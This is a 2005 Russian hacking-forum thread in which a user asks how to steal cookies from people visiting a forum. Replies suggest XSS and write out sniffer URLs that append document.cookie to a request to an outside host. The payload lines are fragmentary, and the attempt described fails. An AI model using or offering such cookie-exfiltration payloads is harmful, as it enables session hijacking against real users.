Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Cookie (https://forum.antichat.xyz/showthread.php?t=11394)

Andrey_Go 06.12.2005 11:12

Cookie
 
Я тут новенькие... не подскажите какие образом можно скатать куки юзера на другой машине, может методом сниффера как нибудь можно. Тот снифер что тут стоит он возвращает только IP и адресную строку.
Возможно ли каким нибудь методом заполучить куки пользователя который просматривают форум (newBB) ?

Заранее спасибо.

grinay 06.12.2005 11:32

Да с помошью xss атаки на этот самый форум который он посещает..

Tem 06.12.2005 21:05

Наверно ты просто ставиш снифер не забудь прописать +(document.cookie), и ты перехватиш куки.

Andrey_Go 07.12.2005 13:50

Цитата:

Сообщение от Tem
Наверно ты просто ставиш снифер не забудь прописать +(document.cookie), и ты перехватиш куки.

Я снифер ставлю в подпись, там разрешено использовать картинки с любого URL. Как мне правельно вписатоь УРЛ ?

http://antichat.ru/cgi-bin/s.jpg+(document.cookie) или
http://antichat.ru/cgi-bin/s.jpg?(document.cookie) или
http://antichat.ru/cgi-bin/s.jpg?document.cookie

Подскажите плиз....

vorishka 07.12.2005 16:51

http://antichat.ru/cgi-bin/s.jpg?+document.cookie; по моему вот так...

Andrey_Go 08.12.2005 01:09

Цитата:

Сообщение от vorishka


Вставляю я это в тэги..... он не воспринимает ЭТО как УРЛ картинки :( что делать ?

byte57 08.12.2005 15:32

ну если Xss баги нет то ниче не поделаешь, хоть куда вставляй...

Andrey_Go 10.12.2005 13:45

Цитата:

Сообщение от .::Gh0st::.
ну если Xss баги нет то ниче не поделаешь, хоть куда вставляй...

Спасибо за помощ. Думаю что тему можно закрыть :-)


Время: 09:27